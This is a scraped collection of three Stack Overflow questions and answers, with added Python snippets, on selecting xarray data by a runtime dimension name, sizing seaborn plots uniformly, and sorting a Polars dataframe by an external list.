79,567,480 | 2025-4-10 | https://stackoverflow.com/questions/79567480/how-to-select-from-xarray-dataset-without-hardcoding-the-name-of-the-dimension | When selecting data from an xarray.Dataset type, the examples they provide all include hardcoding the name of the dimension like so: ds = ds.sel(state_name='California') TLDR; How can you select from a dataset without hardcoding the dimension name? How would I achieve something like this since the below doesn't work? dimName = 'state_name' ds = ds.sel(dimName='California') I have a situation where I won't know the name of the dimension to make my selection on until runtime of the application, but I can't figure out how to select the data with xarray's methods unless I know the dimension name ahead of time. For instance, let's say I have a dataset like this, where dim2, dim3, and dim4 all correspond to ID numbers of different spatial bounds that a user could select on a map: import xarray as xr import numpy as np dim2 = ['12', '34', '56', '78'] dim3 = ['121', '341', '561', '781'] dim4 = ['1211', '3411', '5611', '7811'] time_mn = np.arange(1, 61) ds1 = xr.Dataset( data_vars={ 'prcp_dim2': (['dim2', 'time_mn'], np.random.rand(len(dim2), len(time_mn))), 'prcp_dim3': (['dim3', 'time_mn'], np.random.rand(len(dim3), len(time_mn))), 'prcp_dim4': (['dim4', 'time_mn'], np.random.rand(len(dim4), len(time_mn))), }, coords={ 'dim2': (['dim2'], dim2), 'dim3': (['dim3'], dim3), 'dim4': (['dim4'], dim4), 'time_mn': (['time_mn'], time_mn) } ) print(ds1) <xarray.Dataset> Size: 6kB Dimensions: (dim2: 4, time_mn: 60, dim3: 4, dim4: 4) Coordinates: * dim2 (dim2) <U2 32B '12' '34' '56' '78' * dim3 (dim3) <U3 48B '121' '341' '561' '781' * dim4 (dim4) <U4 64B '1211' '3411' '5611' '7811' * time_mn (time_mn) int64 480B 1 2 3 4 5 6 7 8 ... 53 54 55 56 57 58 59 60 Data variables: prcp_dim2 (dim2, time_mn) float64 2kB 0.8804 0.2733 ... 0.3227 0.4637 prcp_dim3 (dim3, time_mn) float64 2kB 0.1391 0.4541 ... 0.1688 0.3271 prcp_dim4 (dim4, time_mn) float64 2kB 0.4784 0.6666 ... 0.3619 0.4864 Now let's say a a map is presented to a user and the user chooses ID 78 to calculate something from the dataset. From this ID, I can glean the dimension value 78 belongs to is dim2. How would I then make a selection on the xarray dataset where dim2=78 without hardcoding dim2 in? selectedID = request.get('id') #This is the user's choice, let's say they chose '78'. #Get the dimension name the selectedID belongs to if len(selectedID) == 2: selectedDimension = 'dim2' elif len(selectedID) == 3: selectedDimension = 'dim3' elif len(selectedID) == 4: selectedDimension = 'dim4' #This is what I want to be able to do, but it does not work ds = ds.sel(selectedDimension=selectedID) Is there a way to select the data without hardcoding the dimension name? Edit: I do realize there is a solution like this, but that falls apart if say I wanted to put the above version of the if/else in a callable function because I could be reusing it elsewhere and I don't necessarily want to select the data when I call the function. if len(selectedID) == 2: ds = ds.sel(dim2=selectedID) elif len(selectedID) == 3: ds = ds.sel(dim3=selectedID) elif len(selectedID) == 4: ds = ds.sel(dim4=selectedID) | This is a nice place to use Python dictionary unpacking. 
To get this: res = ds.sel(state_name='California') You can: dim_sel = {'state_name': 'California'} res = ds.sel(**dim_sel) And of course directly: res = ds.sel(**{'state_name': 'California'}) Unpacking the dictionary with ** spreads the keys as argument names and the values as the argument values. This solution works anywhere in Python where you need to pass named arguments, it's not specific to xarray. Since you can just construct dictionaries on the fly with strings as key values, you are no longer stuck with using identifiers as parameter names. Your example where you select a dimension based on the length of some value would work out to: dim_lookup = { 2: 'dim2', 3: 'dim3', 4: 'dim4' } res = ds.sel(**{dim_lookup[len(some_value)]: some_value}) Note that this assumes there will be a key for every possible length of selectedID, but I'm sure you can see how to make this more robust. Also note that I assign to res instead of ds because I'm not sure you actually want to overwrite the original xarray reference with your selection. | 1 | 2 |
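The same mechanism works in plain Python, which is worth seeing stripped of xarray entirely (a tiny standalone example):

def describe(**kwargs):
    return ", ".join(f"{k}={v}" for k, v in kwargs.items())

dim_name = "state_name"                          # only known at runtime
print(describe(**{dim_name: "California"}))      # state_name=California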
79,566,634 | 2025-4-10 | https://stackoverflow.com/questions/79566634/how-to-make-same-sized-plots-with-sns-matplotlib | plt.figure(figure=(6,8)) sns.barplot(data=csat_korean,x='grade',y='percentage').set_title('Korean'); plt.show() sns.barplot(data=csat_math,x='grade',y='percentage').set_title('Math'); plt.show() sns.barplot(data=csat_english,x='grade',y='percentage').set_title('English'); plt.show() Hello, the above code is me trying to plot with sns(everything is imported). However, the plots I get are not constant in size. This is the result I get. How would I fix this code so that the plots are same in size, and the last graph is not annoyingly smaller than the other plots? Greatly appreciate it! | With seaborn's catplot(), you can generate a grid of bar plots, starting from a combined dataframe. The size of the subplots is set via the height= and aspect= parameters (width = height * aspect). By default, the x and y axis are shared between the subplots, so they look very similar. from matplotlib import pyplot as plt import seaborn as sns import pandas as pd import numpy as np # generate some dummy test data courses = ['Math', 'English', 'Korean'] csat_data = pd.DataFrame({'course': np.repeat(courses, 9), 'grade': np.tile(np.arange(1, 10), 3), 'count': np.random.randint(10, 1000, size=27)}) csat_data['percentage'] = csat_data.groupby('course')['count'].transform(lambda x: (x / x.sum()) * 100) g = sns.catplot(csat_data, kind='bar', x='grade', y='percentage', row='course', height=8, aspect=6/8) plt.show() PS: For your original dataframes, you can combine them like: csat_math['course'] = 'Math' csat_english['course'] = 'English' csat_korean['course'] = 'Korean' csat_data = pd.concat([csat_math, csat_english, csat_korean]) You can also let Seaborn calculate the histograms directly from the original data. courses = ['Math', 'English', 'Korean'] csat_data = pd.DataFrame({'course': np.repeat(courses, 50), 'grade': np.clip(np.random.normal(loc=6, scale=1.8, size=150).round().astype(int), 1, 9)}) g = sns.displot(csat_data, kind='hist', stat='percent', x='grade', discrete=True, row='course', height=8, aspect=6/8) g.set(xticks=range(1, 10)) plt.show(block=True) | 1 | 1 |
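A lighter-weight alternative to the catplot approach above is to create the axes yourself with one fixed figsize, so every bar plot is guaranteed the same size; the sketch below uses a dummy dataframe standing in for the question's csat_* data:

import matplotlib.pyplot as plt
import pandas as pd
import seaborn as sns

frames = {name: pd.DataFrame({'grade': range(1, 10),
                              'percentage': [10, 8, 12, 15, 20, 15, 10, 6, 4]})
          for name in ('Korean', 'Math', 'English')}

fig, axes = plt.subplots(len(frames), 1, figsize=(6, 18), sharex=True, sharey=True)
for ax, (name, data) in zip(axes, frames.items()):
    sns.barplot(data=data, x='grade', y='percentage', ax=ax)
    ax.set_title(name)
plt.tight_layout()
plt.show()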
79,566,761 | 2025-4-10 | https://stackoverflow.com/questions/79566761/sort-a-polars-dataframe-based-on-an-external-list | Morning, I'm not sure if this can be achieved.. Let's say i have a polars dataframe with cols a, b (whatever). df = pl.DataFrame({"a":[1,2,3,4,5],"b":['x','y','z','p','f']}) And a list.. l = [1,3,5,2,4]; is it possible to sort the dataframe (using column "a") using the list l as the sorting order? Thanks in advance! | You can use an Enum to sort with a custom order, however as Enum only works with strings, you first need to temporarily convert to string: df.sort(by=pl.col('a').cast(pl.String).cast(pl.Enum(list(map(str, l))))) Output: ┌─────┬─────┐ │ a ┆ b │ │ --- ┆ --- │ │ i64 ┆ str │ ╞═════╪═════╡ │ 1 ┆ x │ │ 3 ┆ z │ │ 5 ┆ f │ │ 2 ┆ y │ │ 4 ┆ p │ └─────┴─────┘ | 2 | 2 |
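If you prefer to avoid the round-trip through strings that the Enum approach needs, one alternative (assuming a reasonably recent Polars where Expr.replace accepts a mapping) is to sort by each value's position in the external list:

import polars as pl

df = pl.DataFrame({"a": [1, 2, 3, 4, 5], "b": ['x', 'y', 'z', 'p', 'f']})
l = [1, 3, 5, 2, 4]

rank = {value: position for position, value in enumerate(l)}
out = df.sort(pl.col("a").replace(rank))   # sort key: position of "a" in l
print(out)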